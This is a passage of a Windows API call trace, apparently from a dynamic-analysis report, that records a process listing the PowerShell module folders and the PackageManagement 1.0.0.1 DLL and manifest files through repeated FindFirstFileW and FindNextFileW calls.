ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0182.106] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0182.106] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0182.106] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.107] FindClose (in: hFindFile=0x1a9b6780 | out: hFindFile=0x1a9b6780) returned 1 [0182.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc10) returned 1 [0182.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddbd0) returned 1 [0182.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddcc0) returned 1 [0182.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x1b7dd7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0182.107] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7dd750, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\", lpFilePart=0x0) returned 0x2b [0182.107] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\*", lpFindFileData=0x1b7dd960 | out: lpFindFileData=0x1b7dd960*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6780 [0182.108] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.108] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement", cAlternateFileName="PACKAG~1")) returned 1 [0182.108] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester", cAlternateFileName="")) returned 1 [0182.108] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet", cAlternateFileName="POWERS~1")) returned 1 [0182.109] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 1 [0182.109] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd9b0 | out: lpFindFileData=0x1b7dd9b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline", cAlternateFileName="PSREAD~1")) returned 0 [0182.109] FindClose (in: hFindFile=0x1a9b6780 | out: hFindFile=0x1a9b6780) returned 1 [0182.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddc10) returned 1 [0182.109] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddbd0) returned 1 [0182.109] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0182.109] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d [0182.109] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6ae0 [0182.110] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.110] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0182.110] FindNextFileW (in: hFindFile=0x1a9b6ae0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.110] FindClose (in: hFindFile=0x1a9b6ae0 | out: hFindFile=0x1a9b6ae0) returned 1 [0182.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0182.110] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d [0182.111] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x1b7dd7d0 | out: lpFindFileData=0x1b7dd7d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b64e0 [0182.111] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.179] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0182.179] FindNextFileW (in: hFindFile=0x1a9b64e0, lpFindFileData=0x1b7dd820 | out: lpFindFileData=0x1b7dd820*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0182.179] FindClose (in: hFindFile=0x1a9b64e0 | out: hFindFile=0x1a9b64e0) returned 1 [0182.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda80) returned 1 [0182.180] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dda40) returned 1 [0182.180] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0182.180] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45 [0182.180] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6960 [0182.181] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.181] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0182.181] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.181] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0182.181] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0182.181] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0182.182] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0182.182] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0182.182] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0182.182] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0182.183] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0182.183] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0182.183] FindNextFileW (in: hFindFile=0x1a9b6960, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0182.183] FindClose (in: hFindFile=0x1a9b6960 | out: hFindFile=0x1a9b6960) returned 1 [0182.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0182.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9a0) returned 1 [0182.183] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0182.183] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd430, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45 [0182.184] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x1b7dd640 | out: lpFindFileData=0x1b7dd640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6780 [0182.184] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.184] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0182.184] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.184] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0182.185] FindNextFileW (in: 